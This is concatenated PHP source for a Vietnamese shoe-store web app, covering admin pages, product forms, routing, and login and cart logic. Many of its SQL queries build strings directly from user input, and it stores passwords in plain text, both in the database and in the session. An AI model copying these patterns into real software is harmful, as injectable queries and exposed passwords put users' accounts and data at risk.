- Có <?php $dem1 = 0; $tongthu1=0; foreach ($thongke_hoadon_nam as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1;?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1.'.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_user = 0;
foreach( $data_user as $value )
{
$sum_user +=1;
}
echo "Tổng tài khoản là: "."<br><span style='color:orange;'> $sum_user</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_sanpham = 0;
foreach( $data_sanpham as $value )
{
$sum_sanpham +=1;
}
echo "Tổng sản phẩm là: "."<br><span style='color:orange;'>$sum_sanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_loaisanpham = 0;
foreach( $data_loaisanpham as $value )
{
$sum_loaisanpham +=1;
}
echo "Tổng Loại sản phẩm là: "."<br><span style='color:orange;'>$sum_loaisanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_hoadon = 0;
foreach( $data_hoadon as $value )
{
$sum_hoadon +=1;
}
echo "Tổng hóa đơn là: "."<br><span style='color:orange;'>$sum_hoadon</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_banner = 0;
foreach( $data_banner as $value )
{
$sum_banner +=1;
}
echo "Tổng banner là: "."<br><span style='color:orange;'>$sum_banner</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_khuyenmai = 0;
foreach( $data_khuyenmai as $value )
{
$sum_khuyenmai +=1;
}
echo "Tổng các khuyến mãi là: "."<br><span style='color:orange;'>$sum_khuyenmai</span>";
?>
</div>
</div>
<?php if ($_SESSION['admin'] == true) { ?>
    <div class="col-sm-12">
        <!-- <a href="?action=xoalayout" class="pull-right">Reset data layout</a> -->
        <button onclick="myFunction()">Chỉnh sửa thông tin cửa hàng</button>
        <p><br><br></p>
    </div>
<?php } ?>
<div id="myDIV" hidden>
<div class="container">
<div class="col-sm-12" style="background-color: lightgray;">
<form action="?action=sualayout" method="POST" accept-charset="utf-8">
<h3 style="margin: 30px;"><span id="sualayout"> Header - Footer </span></h3>
<?php foreach ($data_layout as $value) { ?>
<table style="margin-bottom: 70px;">
<tr>
<td style="width: 90px;"> Time</td>
<td> <input name="time" size="70" type="text" value="<?php echo $value['time'] ?>" required></td>
</tr>
<tr>
<td> Mail_1</td>
<td> <input name="mail_1" size="70" type="text" value="<?php echo $value['mail_1'] ?>" required></td>
</tr>
<tr>
<td> Mail_2</td>
<td> <input name="mail_2" size="70" type="text" value="<?php echo $value['mail_2'] ?>" required></td>
</tr>
<tr>
<td> Địa chỉ</td>
<td> <input name="diachi" size="70" type="text" value="<?php echo $value['diachi'] ?>" required></td>
</tr>
<tr>
<td> Đơn vị</td>
<td> <input name="donvi" size="70" type="text" value="<?php echo $value['donvi'] ?>" required></td>
</tr>
<tr>
<td> phone_1 </td>
<td>+84 <input name="phone_1" size="70" type="text" value="<?php echo $value['phone_1'] ?>" required></td>
</tr>
<tr>
<td> phone_2 </td>
<td>+84 <input name="phone_2" size="70" type="text" value="<?php echo $value['phone_2'] ?>" required></td>
</tr>
<tr>
<td> <input size="70" style="width: 90px;" type="submit" value="Sửa"></td>
<td></td>
</tr>
</table>
<?php } ?>
</form>
</div>
</div>
</div>
</div>
</div>
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/views/error_chuasudung.php
<!-- pages-title-start -->
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>TRANG BỊ LỖI</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Giới thiệu</li>
</ol>
</div>
</div>
</section>
<!-- pages-title-end -->
<!-- 404 content section start -->
<div class="pages error-page section-padding">
<div class="container text-center">
<div class="error-content">
<img src="public/img/error.png" alt="" />
<h4 style="color:red;">Error 404 - CÓ GÌ ĐÓ KHÔNG ĐÚNG</h4>
<p>Xin lỗi vì sự bất tiện này, <?php echo $database_error; ?></p>
<a href="?act=home">Trở về trang chủ</a>
</div>
</div>
</div>
<!-- 404 content section end --><file_sep>/views/slider/slider2.php
<!-- slider area start -->
<div class="slider-area home2">
<div class="bend niceties preview-2">
<div id="nivoslider" class="slides">
<?php
foreach ($data_banner as $value) {
?>
<img src="admin/public_admin/image/banner/<?php echo $value['anh'] ?>" alt="">
<?php } ?>
</div>
<!-- direction 1 -->
<div id="slider-direction-1" class="t-cn slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-1">
<div class="title-container s-tb-c title-compress">
<h1 class="title1">Hồng An Store</h1>
<h2 class="title2">Shop hàng uy tín nhất hiện nay</h2>
<!-- <h3 class="title3">Shop hàng uy tín nhất hiện nay</h3> -->
<!-- <a href="#"><span>read more</span></a> -->
</div>
</div>
</div>
<!-- direction 2 -->
<div id="slider-direction-2" class="slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-2">
<div class="title-container s-tb-c">
<h1 class="title1">Hồng An Store 2</h1>
<h2 class="title2">Shop hàng uy tín nhất hiện nay</h2>
<!-- <h3 class="title3">Shop hàng uy tín nhất hiện nay</h3> -->
<!-- <a href="#"><span>read more</span></a> -->
</div>
</div>
</div>
</div>
</div>
<!-- slider area end -->
<!-- service area start -->
<div class="service-area">
<div class="container">
<div class="row">
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="theme/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>FREE SHIPPING</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="theme/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>FREE SHIPPING</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>FREE SHIPPING</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- service area end --><file_sep>/admin/views_admin/sanpham/them.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Thêm sản phẩm</div>
<form action="?action=them_sanpham" method="POST" enctype="multipart/form-data">
<div class="panel-body">
<!-- rows -->
<div class="row" style="margin-top:5px;">
<div class="col-md-2">Danh mục</div>
<div class="col-md-10">
<select name="idLoaiSP" class="form-control" style="width: 300px;">
<?php foreach ($data_lsp as $value) { ?>
<?php echo "<option value='" . $value['idLoaiSP'] . "'>" . $value['tenLSP'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Khuyến mãi</div>
<div class="col-md-10">
<select name="idKM" class="form-control" style="width: 300px;">
<?php foreach ($data_km as $value) { ?>
<?php echo "<option value='" . $value['idKM'] . "'>" . $value['loaiKM'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Màu</div>
<div class="col-md-10">
<select name="idmau" class="form-control" style="width: 300px;">
<?php foreach ($data_mau as $value) { ?>
<?php echo "<option value='" . $value['idcolor'] . "'>" . $value['color'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Size</div>
<div class="col-md-10">
<select name="idsize" class="form-control" style="width: 300px;">
<?php foreach ($data_size as $value) { ?>
<?php echo "<option value='" . $value['idsize'] . "'>" . $value['size'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Tên sản phẩm</div>
<div class="col-md-3 " >
<input type="text" value="" name="tenSP" required class="form-control">
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Đơn giá</div>
<div class="col-md-3">
<input type="text" value="" name="Dongia" required class="form-control">
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ảnh 1</div>
<div class="col-md-3">
<input type="file" value="" name="anh1" required >
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ảnh 2</div>
<div class="col-md-3">
<input type="file" value="" name="anh2" required >
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ảnh 3</div>
<div class="col-md-3">
<input type="file" value="" name="anh3" required>
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ngày nhập</div>
<div class="col-md-2">
<input type="date" value="" name="ngaynhap" required >
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Số lượng</div>
<div class="col-md-3">
<input type="text" value="" name="soluong" required class="form-control">
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Mô tả</div>
<div class="col-md-10">
<textarea name="mota" cols="" rows=""></textarea>
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="" class="btn btn-primary">Thêm</button>
</div>
</div>
<!-- end rows -->
</div>
</form>
</div>
</div>
<script type="text/javascript">
CKEDITOR.replace('mota');
</script><file_sep>/model/dangnhap.php
<?php
//MODEL FOR USER ACCOUNTS
require_once('ketnoi.php');
/**
*
*/
class dangnhap_dangky
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
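	// NOTE: the queries in this model interpolate form input directly into SQL and
	// store passwords in plain text; prepared statements and password hashing would
	// be the safer approach.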
function dangky_model($ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $matkhau)
{
$query= "INSERT INTO user (ho, ten, email, diachi, gioitinh, sodienthoai, tendangnhap, matkhau)
VALUES ('$ho', '$ten', '$email', '$diachi', '$gioitinh', '$sodienthoai', '$tendangnhap', '$matkhau')";
$result = $this->conn->query($query);
if($result == true){
echo "<script>";
echo "location.href='?action=dangnhap';</script>";
}
else{
echo "<script> alert('ĐĂNG KÝ KHÔNG THÀNH CÔNG');";
echo "location.href='?action=trangchu';</script>";
}
}
function dangnhap_model($tendangnhap, $matkhau)
{
$query =" SELECT * FROM user where tendangnhap='".$tendangnhap."' and matkhau = '".$matkhau."' ";
$result = $this->conn->query($query);
// $kq=mysqli_query($this->conn,$sl);
$kq = $this->conn->query($query);
$row=mysqli_fetch_array($kq);
if(mysqli_num_rows($kq)>0)
{
if($row['idQuyen'] == 1){
$_SESSION['admin'] = true;
}else{
$_SESSION['admin'] = false;
}
if($row['idQuyen'] == 2)
{
$_SESSION['banhang'] = true;
}else{
$_SESSION['banhang'] = false;
}
$_SESSION['tendangnhap']=$tendangnhap;
$_SESSION['matkhau']=$matkhau;
			$_SESSION['thoigian_bd']= time(); // login timestamp, used to enforce the session lifetime
// echo "<script language='javascript'>alert('Dang nhap thanh cong');";
echo "<script language='javascript'>location.href='?action=trangchu';</script>";
}
else
{
echo "<script language='javascript'>alert('Dang nhap that bai');";
echo "location.href='?action=dangnhap';</script>";
}
}
	function loaisanpham() // in progress
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function taikhoan($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
return $this->conn->query($query)->fetch_assoc();
}
function suataikhoan($idUser, $ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap)
{
$query="UPDATE user SET ho='$ho',ten='$ten',email='$email', diachi='$diachi', gioitinh='$gioitinh', sodienthoai='$sodienthoai', tendangnhap='$tendangnhap' WHERE idUser='$idUser';";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=taikhoan');
}
}
function suamk($idUser, $matkhau_moi)
{
$query="UPDATE user SET matkhau='$matkhau_moi' WHERE idUser='$idUser' "; //loi thay doi het cac mk 12345
$result = $this->conn->query($query);
}
}
?><file_sep>/admin/views_admin/banner/sua.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Sửa Banner</div>
<div class="panel-body">
<form method="POST" action="?action=suabanner_xl" enctype="multipart/form-data">
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Ảnh thay thế</div>
<div class="col-md-10">
<input type="hidden" name="idbanner" value=<?php echo $data['idbanner']; ?> >
<input type="file" name="anh" value=<?php echo $data['anh']; ?> >
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Ảnh </div>
<div class="col-md-10">
<img style="width:500px; height:200px" src="public_admin/image/banner/<?php echo $data['anh'] ?>" alt="">
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Cập nhập</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
</div>
</div><file_sep>/index.php
<?php
// session_set_cookie_params(5);
session_start();
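// Front controller: each request is dispatched to a controller class based on
// the ?action= query parameter below.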
$act = isset($_GET['action']) ? $_GET['action'] : "trangchu";
switch ($act) {
	//the home page already includes a newest-products section, so nothing extra is added here
	case 'trangchu': // done
require_once('controller/home_controller.php');
$index = new showhome();
$index->list();
break;
	case 'cuahang': // in progress
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list();
break;
	case 'cuahang1': // in progress
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list1();
break;
	//sign in / sign up, not finished yet
case 'dangky_xl':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->dangky();
break;
case 'dangnhap_xl':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->dangnhap();
break;
case 'dangxuat':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->dangxuat();
break;
case 'taikhoan':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->taikhoan();
break;
	case 'suataikhoan': // in progress
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->suataikhoan();
break;
	// in progress
case 'chitietmathang':
require_once('controller/chitietmathang_controller.php');
$index = new chitietmathang();
$index->chitiet_hang();
break;
case 'gopy':
require_once('controller/chitietmathang_controller.php');
$index = new chitietmathang();
$index->gopy();
break;
	//shopping cart
case 'giohang':
$act = isset($_GET['act'])? $_GET['act'] : 'list';
require_once('controller/giohang_controller.php');
$index = new giohang_controller();
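		// nested dispatch: ?action=giohang&act=... selects the cart operation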
switch ($act) {
case 'list':
$index->list_giohang();
break;
case 'add_giohang':
$index->add_giohang();
break;
case 'update_giohang':
$index->update_giohang();
break;
case 'update_giohang_tru':
$index->update_giohang_tru();
break;
case 'xoagiohang_all':
$index->deleteall_cart();
break;
case 'xoagiohang':
$index->delete_cart();
break;
default:
$index->list_giohang();
break;
}
break;
case 'gioithieu':
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list();
break;
	// reusing the cuahang controller's functionality works here too
case 'dangnhap':
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list();
break;
case 'quenmatkhau':
require_once('controller/quenmatkhau_controller.php');
$index = new quenmk();
$index->list();
break;
case 'laymatkhau_submit':
require_once('controller/quenmatkhau_controller.php');
$index = new quenmk();
$index->laymk();
break;
case 'thanhtoan':
require_once('controller/thanhtoan_controller.php');
$index = new showthanhtoan();
$index->list();
break;
case 'hoanthanhdonhang':
require_once('controller/hoanthanhdonhang_controller.php');
$index = new hoanthanhdonhang();
$index->list();
break;
case 'huy_session':
require_once('controller/hoanthanhdonhang_controller.php');
$index = new hoanthanhdonhang();
$index->huy_session();
break;
default:
require_once('controller/home_controller.php');
$index = new showhome();
$index->list();
break;
}
// echo $_SESSION['thoigian_bd'];
// echo "<br>";
// echo $_SESSION['thoigian_bd'] - time();
// Expiry window after which the SESSIONs are destroyed; thoigian_bd is set at line 66 of model/dangnhap.php
if(isset($_SESSION['tendangnhap'])){
	if(time() - $_SESSION['thoigian_bd'] > 3600){ // one hour = 60x60 = 3600 seconds; 24 hours = 3600x24 = 86400
unset($_SESSION['banhang']);
unset($_SESSION['tendangnhap']);
unset($_SESSION['matkhau']);
unset($_SESSION['thoigian_bd']);
		// clear the shopping-cart session data
unset($_SESSION['sanpham']);
unset($_SESSION['thanhtien']);
unset($_SESSION['tongtien']);
}
}
?><file_sep>/admin/views_admin/taikhoan/Quanlytaikhoan.php
<div class="col-md-12">
<div style="margin-bottom:5px;">
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=them_giaodien" class="btn btn-primary">Thêm tài khoản</a>
<?php } else {
} ?>
</div>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách tài khoản</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">Mã NV</th>
<th style="text-align:center;">Họ</th>
<th style="text-align:center;">Tên</th>
<th style="text-align:center;">Số ĐT</th>
<th style="text-align:center;">Email</th>
<th style="text-align:center;">Quyền</th>
<th style="text-align:center;">Giới tính</th>
<th style="text-align:center;">Địa chỉ</th>
<th style="text-align:center;">Phân quyền</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $row) : ?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $row['idUser'] ?></td>
<td><?= $row['ho'] ?></td>
<td><?= $row['ten'] ?></td>
<td><?= $row['sodienthoai'] ?></td>
<td><?= $row['email'] ?></td>
<td>
<?php if ($row['idQuyen'] == 1) {
echo "admin";
}
if ($row['idQuyen'] == 2) {
echo "Người Bán Hàng";
}
if ($row['idQuyen'] == 0) {
echo "Khách hàng";
}
?>
</td>
<td><?= $row['gioitinh'] ?></td>
<td><?= $row['diachi'] ?></td>
<?php if ($_SESSION['admin'] == true) { ?>
<td>
<div style="font-size: 13px;"><a href="?action=phanquyen&id=<?= $row['idUser'] ?>&quyen=0">Khách hàng</a> <a href="?action=phanquyen&id=<?= $row['idUser'] ?>&quyen=2">Người bán hàng</a></div>
</td>
<td> <a href="?action=edit&id=<?= $row['idUser'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoanguoidung&id=<?= $row['idUser'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa người dùng">
<i class="fa fa-times"></i></a>
</td>
<!-- phân quyền -->
<?php } else {
} ?>
</tr>
<?php
endforeach;
?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<!-- end content -->
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/model/show_thanhtoan.php
<?php
require_once('ketnoi.php');
/**
*
*/
class thanhtoan
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chitiet_donhang($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
function chitiet_khuyenmai($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
function chitiet_sanpham($Dongia)
{
// $query = "SELECT * FROM sanpham WHERE Dongia = '$Dongia' ";
$query = "SELECT * FROM sanpham INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM WHERE Dongia = '$Dongia'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
}
?><file_sep>/controller/quenmatkhau_controller.php
<?php
// require_once('views/index.php'); the view only renders once this call is made
require_once('./model/quenMK.php');
/**
*
*/
class quenmk
{
var $quenmk_controller;
function __construct()
{
$this->quenmk_controller = new Matkhau();
}
public function list()
{
$data_loaisanpham = $this->quenmk_controller->loaisanpham();
$email = filter_input(INPUT_POST, 'email_laymk');
$email_laymk = $this->quenmk_controller->laymatkhau($email);
require_once('views/index.php');
}
public function laymk()
{
$data_loaisanpham = $this->quenmk_controller->loaisanpham();
$email = filter_input(INPUT_POST, 'email_laymk');
$mk = $this->quenmk_controller->laymatkhau($email);
if($mk){
$ketqua = true;
}
require_once('views/index.php');
}
}
?><file_sep>/controller/dangnhap_controller.php
<?php
require_once('./model/dangnhap.php');
/**
*
*/
class dangnhap_dangky_controller
{
var $dangnhap_dangky_model;
function __construct()
{
$this->dangnhap_dangky_model = new dangnhap_dangky();
}
public function dangky()
{
$ho = filter_input(INPUT_POST, 'ho_dk');
$ten =filter_input(INPUT_POST, 'ten_dk');
$email =filter_input(INPUT_POST, 'email_dk');
$diachi =filter_input(INPUT_POST, 'diachi_dk');
$gioitinh =filter_input(INPUT_POST, 'gioitinh_dk');
$sodienthoai =filter_input(INPUT_POST, 'sdt_dk');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap_dk');
$mk_dk = filter_input(INPUT_POST, 'matkhau_dk');
// $matkhau = md5("$mk_dk");
$this->dangnhap_dangky_model->dangky_model($ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $mk_dk);
}
public function dangnhap()
{
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap_dn');
$mk_dn =filter_input(INPUT_POST, 'matkhau_dn');
// $matkhau = md5($mk_dn);
$matkhau =$mk_dn;
$this->dangnhap_dangky_model->dangnhap_model($tendangnhap, $matkhau);
}
public function dangxuat()
{
if(isset($_SESSION['tendangnhap'])){
unset($_SESSION['tendangnhap']);
unset($_SESSION['matkhau']);
echo "<script language='javascript'></script>"; //alert('Đăng xuất thành công');
echo "<script language='javascript'>location.href='?action=trangchu';</script>";
}
}
public function taikhoan()
{
$data_loaisanpham = $this->dangnhap_dangky_model->loaisanpham();
$tendangnhap = $_SESSION['tendangnhap'];
$data_taikhoan = $this->dangnhap_dangky_model->taikhoan($tendangnhap);
		// change the password
$mk_nhap = filter_input(INPUT_POST, 'matkhau');
$matkhau_nhap = md5($mk_nhap);
$mk_moi = filter_input(INPUT_POST, 'matkhaumoi');
$matkhau_moi = md5($mk_moi);
$idUser = filter_input(INPUT_POST, 'idUser');
		// debug spot: echo $data_taikhoan['ten']; here to inspect the loaded account
if($matkhau_nhap != $data_taikhoan['matkhau']){
$mess = false;
}else{
$mess = true;
$this->dangnhap_dangky_model->suamk($idUser, $matkhau_moi);
}
require_once('views/index.php');
}
public function suataikhoan()
{
$ho = filter_input(INPUT_POST, 'ho');
$ten =filter_input(INPUT_POST, 'ten');
$email =filter_input(INPUT_POST, 'email');
$diachi =filter_input(INPUT_POST, 'diachi');
$gioitinh =filter_input(INPUT_POST, 'gioitinh');
$sodienthoai =filter_input(INPUT_POST, 'sodienthoai');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap');
$matkhau =filter_input(INPUT_POST, 'matkhau');
$idUser = filter_input(INPUT_POST, 'idUser');
$this->dangnhap_dangky_model->suataikhoan($idUser, $ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap);
require_once('views/index.php');
}
}
?><file_sep>/admin/model_admin/sanpham.php
<?php
// MODEL FOR PRODUCT INFORMATION
require_once('ketnoi.php');
/**
*
*/
class sanpham
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
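	// The phantrang ("paging") helpers return the raw mysqli result set, presumably
	// so the caller can count rows when building the pagination.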
function phantrang()
{
$query = "SELECT * FROM sanpham";
return $this->conn->query($query);
}
function phantrang_timkiem($timkiem_sp)
{
$query = "SELECT * FROM sanpham WHERE tenSP LIKE '%$timkiem_sp%'";
return $this->conn->query($query);
}
function all_them()
{
$query = "SELECT * FROM sanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all($batdau, $gioihan)
{
$query = "SELECT * FROM sanpham ORDER BY soluong LIMIT $batdau, $gioihan";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function timkiem_sp($timkiem_sp, $batdau, $gioihan)
{
$query = "SELECT * FROM sanpham WHERE tenSP LIKE '%$timkiem_sp%' LIMIT $batdau, $gioihan";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function find($id)
{
$query = "SELECT * FROM sanpham
INNER JOIN color ON sanpham.idcolor = color.idcolor
INNER JOIN size ON sanpham.idsize = size.idsize
WHERE idSP=$id";
return $this->conn->query($query)->fetch_assoc();
}
function update($idSP, $idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong)
{
$query="UPDATE sanpham SET idKM='$idKM', idLoaiSP='$idLoaiSP', idcolor='$idcolor', idsize='$idsize', tenSP='$tenSP', Dongia='$Dongia', anh1='$anh1', anh2='$anh2', anh3='$anh3', ngaynhap='$ngaynhap', mota='$mota', soluong='$soluong' WHERE idSP='$idSP';";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=sanpham');
}
}
function insert($idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong)
{
$query= "INSERT INTO sanpham (idKM, idLoaiSP, idcolor, idsize, tenSP, Dongia, anh1, anh2, anh3, ngaynhap, mota, soluong)
VALUES ('$idKM','$idLoaiSP','$idcolor', '$idsize', '$tenSP', '$Dongia', '$anh1', '$anh2', '$anh3', '$ngaynhap', '$mota', '$soluong') ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=sanpham');
}
else{
header('location: ?action=them_sanpham_giaodien');
}
}
	// if the product already exists, add to its stored quantity instead
function insert_trung($idSP, $soluong_them)
{
$query= "UPDATE sanpham SET soluong = '$soluong_them' WHERE idSP = '$idSP' ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=sanpham');
}
else{
header('location: ?action=them_sanpham_giaodien');
}
}
function delete($id) //dang
{
$query = "DELETE FROM sanpham WHERE idSP='$id' ";
$result = $this->conn->query($query);
if($result == true){
echo "<script> ";
echo "location.href='?action=sanpham';</script>";
}else{
echo "<script> ";
echo "location.href='?action=sanpham';</script>";
}
}
function khuyenmai()
{
$query = "SELECT * FROM khuyenmai";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function mau()
{
$query = "SELECT * FROM color";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function size()
{
$query = "SELECT * FROM size";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function loaisp()
{
$query = "SELECT * FROM loaisanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
public function them_soluong($idSP, $soluong_them)
{
$query= "UPDATE sanpham SET soluong = '$soluong_them' WHERE idSP = '$idSP' ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=sanpham');
}
else{
header('location: ?action=sanpham');
}
}
}
?><file_sep>/admin/views_admin/layout/layout2.php
<div id="viewport">
<!-- Sidebar -->
<div id="sidebar">
<header>
<a href="../?action=trangchu" title="xem trang web">
<div style="color:white;" href="#">Quản Trị Viên<br> </div>
<div style="line-height: 1px; color:white;font-size: 10px;"><span style="color:orange;">SHOE</span> STORE</div>
</a>
</header>
<ul class="nav">
<li>
<a href="?action=trangchu">
<i class="fa fa-home"></i>Trang chủ
</a>
</li>
<li>
<a href="?action=taikhoan">
<i class="fa fa-table"></i>Quản lý tài khoản
</a>
</li>
<li>
<a href="?action=sanpham">
<i class="fa fa-table"></i>Quản lý sản phẩm
</a>
</li>
<li>
<a href="?action=loaisanpham">
<i class="fa fa-table"></i>Quản lý loại sản phẩm
</a>
</li>
<li>
<a href="?action=hoadon">
<i class="fa fa-table"></i>Hóa đơn
</a>
</li>
<li>
<a href="?action=banner">
<i class="fa fa-table"></i> Quản lý banner
</a>
</li>
<li>
<a href="?action=khuyenmai">
<i class="fa fa-table"></i>Quản lý khuyến mãi
</a>
</li>
</ul>
</div>
<!-- Content -->
<div id="content">
<nav class="navbar navbar-default">
<div class="container-fluid">
<ul class="nav navbar-nav navbar-left">
<li>
<!--
<div class="search_box pull-right">
<input type="text" placeholder="Search"/> 
<a href="#"><i class="fa fa-search" id="i1"></i></a>
<span style="font-size: 20px;padding-left: 10px;"> |</span>
</div>
-->
</li>
<li>
<a href="#" style="margin-right: 30px;">
<img class="anhuser" src="public_admin/image/author.jpg" alt=""> 
<?php
if(isset($_SESSION['tendangnhap'])){
echo "Xin chào ". $_SESSION['tendangnhap'];
}else{
echo "Xin Chào ...";
}
?>
</a>
